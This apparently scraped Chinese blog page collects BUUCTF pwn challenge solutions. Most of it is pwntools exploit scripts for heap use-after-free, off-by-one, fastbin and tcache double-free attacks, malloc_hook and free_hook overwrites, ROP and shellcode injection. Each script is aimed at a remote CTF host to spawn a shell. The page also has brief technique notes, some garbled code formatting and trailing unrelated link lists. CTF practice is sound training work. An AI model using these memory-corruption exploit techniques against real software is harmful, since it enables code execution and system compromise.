from LibcSearcher import *
# context(arch = 'amd64', os = 'linux', endian = 'little')
context(arch = 'i386', os = 'linux', endian = 'little')
context.log_level = 'debug'
context.terminal = ['tmux', 'splitw', '-h']
elf = ELF('./hacknote')
# libc = ELF('./libc.so.6') ip = 'node3.buuoj.cn'
port = 25882
debug = 0 if debug == 1:
p = process('./hacknote')
else:
p = remote(ip,port)
# p = remote('127.0.0.1',10001) def add_note(Size,content):
p.recvuntil('Your choice :')
p.sendline("1")
p.recvuntil('Note size :')
p.sendline(str(int(Size)))
p.recvuntil('Content :')
p.sendline(content) def del_note(Index):
p.recvuntil('choice :')
p.sendline('2')
p.recvuntil('Index :')
p.sendline(str(Index)) def print_note(Index):
p.recvuntil('choice :')
p.sendline('3')
p.recvuntil('Index :')
p.sendline(str(Index)) magic_addr= 0x8048945 # raw_input()
add_note(0x10,'aaa') #00-01
add_note(0x10,'bbb') #10-11
add_note(0x40,'ddd') #20-21 del_note(1) #de10 de11
del_note(0) #de00 de01
# raw_input()
add_note(0x8,p32(magic_addr)) #add00-add10
print_note(1) #eip-->10 p.interactive()

[V&N2020 公开赛]simpleHeap

关键词:off-by-one、malloc_hook改写、unsortbin泄露libc信息

#!python
#coding:utf-8 from pwn import *
import binascii
from LibcSearcher import *
# context(arch = 'amd64', os = 'linux', endian = 'little')
context(arch = 'i386', os = 'linux', endian = 'little')
context.log_level = 'debug'
# context.terminal = ['tmux', 'splitw', '-h']
elf = ELF('./vn_pwn_simpleHeap')
# libc = ELF('./libc') ip = 'node3.buuoj.cn'
port = 29141
debug = 0 if debug == 1:
p = process('./vn_pwn_simpleHeap')
else:
p = remote(ip,port)
# p = remote('127.0.0.1',10001) def add(Size,Content):
p.recvuntil('choice: ')
p.sendline('1')
p.recvuntil('size?')
p.sendline(str(Size))
p.recvuntil('content:')
p.sendline(Content)
def edit(idx,Content):
p.recvuntil('choice: ')
p.sendline('2')
p.recvuntil('idx?')
p.sendline(str(idx))
p.recvuntil('content:')
p.sendline(Content)
pass
def show(idx):
p.recvuntil('choice: ')
p.sendline('3')
p.recvuntil('idx?')
p.sendline(str(idx))
pass
def delete(idx):
p.recvuntil('choice: ')
p.sendline('4')
p.recvuntil('idx?')
p.sendline(str(idx))
pass
def exit():
p.recvuntil('choice: ')
p.sendline('5')
pass # raw_input('pause') #b *$rebase(0xf07)
add(24,'0000\n') #0x18+0x10
add(96,'1111\n') #0x60+0x10
add(96,'2222\n') #0x60+0x10
add(16,'3333\n') #0x10+0x10 payload = 'a'*0x18 + '\xe1' #rewrite next chunk low addr-->size edit(0,payload)
# gdb.attach(p,"b *$rebase(0xf07)")
delete(1)
add(96,'1112\n')
show(2)
main_arena = u64(p.recvline()[:-1].ljust(8,'\x00'))-88
print hex(main_arena) libcbase = main_arena - 0x3C4B20
malloc_hook = libcbase + 0x0000000003c4b10
realloc_hook = libcbase + 0x0000000003c4b08
free_hook = libcbase + 0x0000000003c67a8
one_gadget_addr = [0x45216,0x4526a,0xf02a4,0xf1147]
print '------malloc_hook =',hex(malloc_hook)
print '------realloc_hook =',hex(realloc_hook)
print '------free_hook =',hex(free_hook) add(96,'4444\n')
# gdb.attach(p,"b *$rebase(0xf07)")
delete(4) payload2 = p64(malloc_hook - 0x23)
edit(2,payload2)
add(96,'5555\n') payload3 = 'a'*0x13+p32(one_gadget_addr[2])
add(96,payload3) p.interactive()

堆的六种利用手法https://bbs.pediy.com/thread-246786.htm

jarvisoj_test_your_memory

关键词:scanf函数的栈溢出

#!python
#coding:utf-8 from pwn import *
from LibcSearcher import *
# context(arch = 'amd64', os = 'linux', endian = 'little')
context(arch = 'i386', os = 'linux', endian = 'little')
context.log_level = 'debug'
elf = ELF('./memory')
# libc = ELF('./libc.so.6') ip = 'node3.buuoj.cn'
port = 28649
debug = 0 if debug == 1:
p = process('./memory')
else:
p = remote(ip,port)
# p = remote('127.0.0.1',10001) cat_flag_addr = 0x80487e0
main_addr = 0x8048677
system_addr = 0x8048440 payload = 'a'*0x13+'bbbb'+p32(system_addr) + p32(main_addr) + p32(cat_flag_addr) # p.recv()
p.sendline(payload) p.interactive()

[ZJCTF 2019]Login

关键词:64位c++程序、程序(**a1)(&s)执行栈上地址、strcmp函数\x00截断绕过判断

#!python
#coding:utf-8 from pwn import *
from LibcSearcher import *
context(arch = 'amd64', os = 'linux', endian = 'little')
# context(arch = 'i386', os = 'linux', endian = 'little')
context.log_level = 'debug'
elf = ELF('./login')
# libc = ELF('./libc.so.6') ip = 'node3.buuoj.cn'
port = 25531
debug = 0 if debug == 1:
p = process('./login')
else:
p = remote(ip,port)
# p = remote('127.0.0.1',10001) get_shell = 0x0000000000400E88
name = 'admin'
passwd = '2jctf_pa5sw0rd\0'.ljust(72,'\0') + p64(get_shell)
p.recv()
p.sendline(name)
p.recv()
p.sendline(passwd) #gdb.attach(p)
p.interactive()

[ZJCTF 2019]EasyHeap

关键词:fastbin attack、堆溢出、heap of spirit、

key:通过数组头指针到free_got的地址,再修改第一个数组的值从而达到修改free_got的值(system_plt),再在heap中存放'/bin/sh\x00'作为参数,调用free达到了system(''/bin/sh\x00';xxxxxx;xxxxx),\x00会自动截断

#!python
#coding:utf-8 from pwn import *
from LibcSearcher import *
context(arch = 'amd64', os = 'linux', endian = 'little')
# context(arch = 'i386', os = 'linux', endian = 'little')
context.log_level = 'debug'
elf = ELF('./easyheap')
# libc = ELF('./libc.so.6') ip = 'node3.buuoj.cn'
port = 25097
debug = 0 if debug == 1:
p = process('./easyheap')
else:
p = remote(ip,port)
# p = remote('127.0.0.1',10001) cat_flag_addr = 0x000000000400C23 def add(Size,Content):
p.recvuntil('choice :')
p.sendline('1')
p.recvuntil('Size of Heap :')
p.send(str(Size))
p.recvuntil('Content of heap:')
p.send(Content) def edit(Index,Size,Content):
p.recvuntil('choice :')
p.sendline('2')
p.recvuntil('Index :')
p.sendline(str(Index))
p.recvuntil('Size of Heap :')
p.sendline(str(Size))
p.recvuntil('Content of heap :')
p.send(Content) def delelte(Index):
p.recvuntil('choice :')
p.sendline('3')
p.recvuntil('Index :')
p.sendline(str(Index)) def exit():
p.recvuntil('choice :')
p.sendline('4') free_got = elf.got['free']
#0x6020ad
system_addr = elf.sym['system']
print '----system_add = ' + hex(system_addr)
print '----free_got = ' + hex(free_got)
raw_input('pause')
add(96,'0000\n') #0
add(96,'1111\n') #1
add(96,'2222\n') #2
add(16,'3333\n') #3 delelte(2)
paylaod = '/bin/sh\x00' + 'a'*88 + p64(0) + p64(0x71) + p64(0x6020ad)
edit(1,len(paylaod),paylaod) add(96,'4444\n') #2
paylaod2 = 'b'*0x20 + 'bbb'+ p64(free_got)
add(96,paylaod2) #4 paylaod3 = p64(system_addr)
edit(0,len(paylaod3),paylaod3) delelte(1) #gdb.attach(p)
p.interactive()

jarvisoj_typo

关键词:32位arm、arm栈溢出、arm下的ROP、无符号

key:本应该用rizzo工具恢复符号,然后找出system_plt函数地址,但是不知道为什么用不上(可以通过寻找/bin/sh来定位system函数的地址),这里贴出找到的system位置进行mark(眼熟)一下。

#!python
#coding:utf-8 from pwn import *
from LibcSearcher import *
context(arch = 'amd64', os = 'linux', endian = 'little')
# context(arch = 'i386', os = 'linux', endian = 'little')
context.log_level = 'debug'
elf = ELF('./typo')
# libc = ELF('./libc.so.6') ip = 'node3.buuoj.cn'
port = 29978
debug = 0 if debug == 1:
p = process('./typo')
else:
p = remote(ip,port)
# p = remote('127.0.0.1',10001) pop_r0_r4_pc = 0x00020904
str_bin_sh = 0x0006c384
# system_addr = [0x0006c986,]
# system_addr1 = elf.plt['system']
# print 'system_addr1 = ',hex(system_addr1)
system_addr = 0x110B4 p.recvuntil('want to quit\n')
p.sendline()
p.recv() payload = 'a' * 112 + p32(pop_r0_r4_pc) + p32(str_bin_sh) + p32(1) + p32(system_addr)
p.sendline(payload) #gdb.attach(p)
p.interactive()

starctf_2019_girlfriend

关键词:uaf、double free、unsortbin泄露地址信息、修改malloc_hook

buuctf的这个题目是在ubuntu16环境下的、不用考虑tcache

#!python
#coding:utf-8 from pwn import *
from LibcSearcher import *
context(arch = 'amd64', os = 'linux', endian = 'little')
# context(arch = 'i386', os = 'linux', endian = 'little')
# context.log_level = 'debug'
elf = ELF('./starctf_2019_girlfriend')
libc = ELF('./libc-2.23.so') ip = 'node3.buuoj.cn'
port = 29337
debug = 0 if debug == 1:
p = process('./starctf_2019_girlfriend')
else:
p = remote(ip,port)
# p = remote('127.0.0.1',10001) def add(size,name='',call=''):
p.sendlineafter(':','1')
p.sendlineafter('name',str(size))
p.sendlineafter('name:',name)
p.sendlineafter('call:',call) def show(idx):
p.sendlineafter(':','2')
p.sendlineafter('index:',str(idx))
p.recvuntil('name:\n') def free(idx):
p.sendlineafter(':','4')
p.sendlineafter('index:',str(idx)) # raw_input('----------------gdb waiting----------------') add(0x80, 'chunk0\n', '0000')#0
add(0x68, 'chunk1\n', '1111')#1
add(0x68, 'chunk2\n', '2222')#2
add(0x68, '/bin/sh\n', '3333')#3 free(0)
show(0) # main_arena = u64(p.recv(6).ljust(8,'\x00')) -88
malloc_hook = u64(p.recv(6).ljust(8,'\x00')) -88 - 0x10
# print 'main_arena = ' ,hex(main_arena)
print 'malloc_hook =',hex(malloc_hook) # libcbase = main_arena - 0x3B1C40
libcbase = malloc_hook - libc.sym['__malloc_hook']
system_addr = libcbase + libc.sym['system']
realloc = libcbase + libc.sym['realloc']
free_gook_addr = libcbase + libc.sym['__free_hook']
one_gadget_offset = [0x45216,0x4526a,0xf02a4,0xf1147]
one_gadget = libcbase + one_gadget_offset[3]
# success("main_arena:"+hex(main_arena))
success("libcbase:"+hex(libcbase)) free(1)
free(2)
free(1) add(0x68,p64(malloc_hook-0x23)+'\n','2111') #key chunk
add(0x68,'2222\n','2111')
add(0x68,'2111\n','2111')
payload = 'a'* (0x13-8) + p64(one_gadget) + p64(realloc)
add(0x68,payload,'4444') p.recv()
#then send '1' can get shell p.interactive()

关键词:uaf、double free、unsortbin泄露地址信息、tcache attack、

环境在ubuntu19.04下,libc-2.2.9.so需要通过tcache(2.26以后都需要考虑)

可以申请一个较大的chunk,大于等于0x420,释放后直接进入largebin,然后show进行libc的泄露,从而计算处libc_base,得到相关的地址(malloc_hook、system、onegadget、free_hook等)

name = "aaaa"
phone = '1'*0xc add(0x440,name,phone) #0 put into largebin
add(0x18,name,phone) #1
delete(0)
show(0)
p.recvuntil("name:\n")
leak_addr = u64(p.recv(6).ljust(8,'\x00'))
print "leak_addr:",hex(leak_addr)
libc_base = leak_addr - libc.symbols["__malloc_hook"] - 0x70
print "libc_base:",hex(libc_base) free_hook = libc_base + libc.symbols["__free_hook"]
one_gadget = libc_base + 0xdf99d
system = libc_base + libc.symbols["system"]
malloc_hook = libc_base + libc.symbols["__malloc_hook"]

通过申请7个chunk+2个chunk共9个chunk,free出7个fastbin大小的chunk填充tcache,然后利用多余的两个chunk制造出double free。

add(0x440,name,phone) #2

for i in range(7):
add(0x68,name,phone) #3~9 malloc from unsorted bin add(0x68,name,phone) #10 malloc from top chunk
add(0x68,name,phone) #11 delete(9) for i in range(6):
delete(i+3) #3~8 add(0x68,name,phone) #12 == 8 0x580
add(0x68,name,phone) #13 == 7 0x4f0 ##fill tcache
delete(10)
delete(11) ##double free
##fastbin 12->13->12
delete(12)
delete(13)
delete(12)

然后把tcache中的fastbin全部malloc出来,tcache清空后再malloc时,就会将fastbin里的chunk放入tcache,就能得到被我们double free的2个chunk,从而复写任意地址。(这里复写了free_hook的地址,然后free传入/bin/sh的chunk时,就会触发system(/bin/sh)从而get shell)

##empty tcache
for i in range(7):
add(0x68,name,phone) #14~20 add(0x68,p64(free_hook),phone) #21 == 12 fastbin 0x70 chunks put into tcache
add(0x68,name,phone) #22 == 13
add(0x68,"/bin/sh\x00",phone) #23 == 12
add(0x68,p64(system),phone) #24 ##trigger
delete(23)

starctf_2019_babyshell

关键词:汇编指令、shellcraft、\x00截断。

还有个其他方法的链接:https://www.cnblogs.com/Rookle/p/12895895.html

from pwn import *
context.log_level='debug'
context.arch='amd64'
p=process('./starctf_2019_babyshell')
#gdb.attach(p,'b *0x4008cb')
# p=remote("34.92.37.22",10002) shellcode = asm(shellcraft.sh()) p.sendlineafter(":","\x00ng"+shellcode) #gs\njaZ
p.interactive()

starctf_2019_upxofcpp

关键词:upx脱壳、heap段可执行的upx、uaf、vtable call to run shellcode

知识点:asm(jmp .+_n) jmp .+0x10表示跳当前地址+0x10,可能是2字节或者5字节主要看n和符号例如+0x81-0x7e (shellcode可以不连续了,还可以往回跳.)

  • Fake the vtable via malloc_consolidate, write your shellcode on the heap
  • Trigger the UAF vulnerability by remove or show, then call rax will jump on the shellcode
  • Details in solve.py
  • It has nothing to do with libc

    Buuctf刷题:部分的更多相关文章

    1. BUUCTF刷题记录(Web方面)

      WarmUp 首先查看源码,发现有source.php,跟进看看,发现了一堆代码 这个原本是phpmyadmin任意文件包含漏洞,这里面只不过是换汤不换药. 有兴趣的可以看一下之前我做的分析,http ...

    2. BUUCTF刷题系列(2)5.27日记

      CTF-Bugku-安卓篇1signin Writeup Bugku安卓部分第一题,第七届山东省大学生网络安全技能大赛的题目,属于Android逆向分析.(常用工具:安卓模拟器.JEB.Cyberch ...

    3. buuctf刷题之旅—web—EasySQL

      打开环境,发现依旧是sql注入 GitHub上有源码(https://github.com/team-su/SUCTF-2019/tree/master/Web/easy_sql) index.php ...

    4. buuctf刷题之旅—web—随便注

      打开环境 根据提示应该是sql注入 查看数据库名,和数据表 1';show databases;# 1';show tables;# 查看表内字段(1';desc `1919810931114514` ...

    5. buuctf刷题之旅—web—WarmUp

      启动靶机 查看源码发现source.php 代码审计,发现hint.php文件 查看hint.php文件(http://7ab330c8-616e-4fc3-9caa-99d9dd66e191.nod ...

    6. BUUCTF刷题系列(1)5.25日记

      前面的题目都不太难,就直接从SQL注入开始了. 这个样子的话,明显就是注入,我们先拿出SQL语句:http://fb415201-6634-4fc3-a6bc-a67b84ea1ed2.node3.b ...

    7. BUUCTF刷题记录(更新中...)

      极客大挑战 2019]EasySQL-1 直接通过输入万能密码:' or 1=1#实现注入: 思考:服务端sql语句应该为:select * from users where username='xx ...

    8. buuctf刷题记录

      极客大挑战 2019]EasySQL-1 直接通过输入万能密码:' or 1=1#实现注入: 思考:服务端sql语句应该为:select * from users where username='xx ...

    9. 刷题记录:[BUUCTF 2018]Online Tool

      目录 刷题记录:[BUUCTF 2018]Online Tool 一.知识点 1.escapeshellarg和escapeshellcmd使用不当导致rce 刷题记录:[BUUCTF 2018]On ...

    随机推荐

    1. 备战春招!开源社区系统 Echo 超全文档助力面试

      博主东南大学硕士在读,寒假前半个月到现在差不多一个多月,断断续续做完了这个项目,现在终于可以开源出来了,我的想法是为这个项目编写一套完整的教程,包括技术选型分析.架构分析.业务逻辑分析.核心技术点分析 ...

    2. 用一次就会爱上的cli工具开发

      本文转载自用一次就会爱上的cli工具开发 写在前面 最近接手任务--使用nodejs开发一个公司内部使用的cli工具,简而言之就是输入一行命令快速搭建好项目结构,也可以通过不同的命令引入不同的文件. ...

    3. Vue学习笔记-Vue.js-2.X 学习(五)===>脚手架Vue-CLI(PyCharm)

      Vue项目在pycharm中配置 退出运行: ctrl+c Vue学习笔记-Vue.js-2.X 学习(六)===>脚手架Vue-CLI(项目说明)

    4. SpringCloud(四):服务注册中心Eureka Eureka高可用集群搭建 Eureka自我保护机制

      第四章:服务注册中心 Eureka 4-1. Eureka 注册中心高可用集群概述在微服务架构的这种分布式系统中,我们要充分考虑各个微服务组件的高可用性 问题,不能有单点故障,由于注册中心 eurek ...

    5. APP跳转小程序,小程序跳转APP

      关注公共号,搜索 "APP跳转小程序,小程序跳转APP",查看原文 前置条件: 开发环境:windows 开发框架:uni-app , H5+,nativeJS,mpvue 编辑器 ...

    6. Linux操作php.ini文件

      有时你使用的是别人搭建好的环境,不知道php.ini在哪里,或者好久没有修改配置了,已经忘记了路径在哪,所以在操作文件之前,得先要找到.ini路径. 找php.ini 方式一 $ php -i | g ...

    7. Hi3559AV100外接UVC/MJPEG相机实时采图设计(二):V4L2接口的实现(以YUV422为例)

      下面将给出Hi3559AV100外接UVC/MJPEG相机实时采图设计的整体流程,主要实现是通过V4L2接口将UVC/MJPEG相机采集的数据送入至MPP平台,经过VDEC.VPSS.VO最后通过HD ...

    8. 安装JDK步骤,配置环境变量

      DK是Java语言的软件开发工具包,主要用于移动设备.嵌入式设备上的java应用程序.JDK是整个java开发的核心,它包含了JAVA的运行环境(JVM+Java系统类库)和JAVA工具.所以今天教一 ...

    9. python多线程参考文章

      1. https://www.jianshu.com/p/c93e630d8089 2.https://www.runoob.com/python/python-multithreading.html ...

    10. PTA 有序数组的插入

      6-5 有序数组的插入 (20 分)   本题要求将任一给定元素插入从大到小排好序的数组中合适的位置,以保持结果依然有序. 函数接口定义: bool Insert( List L, ElementTy ...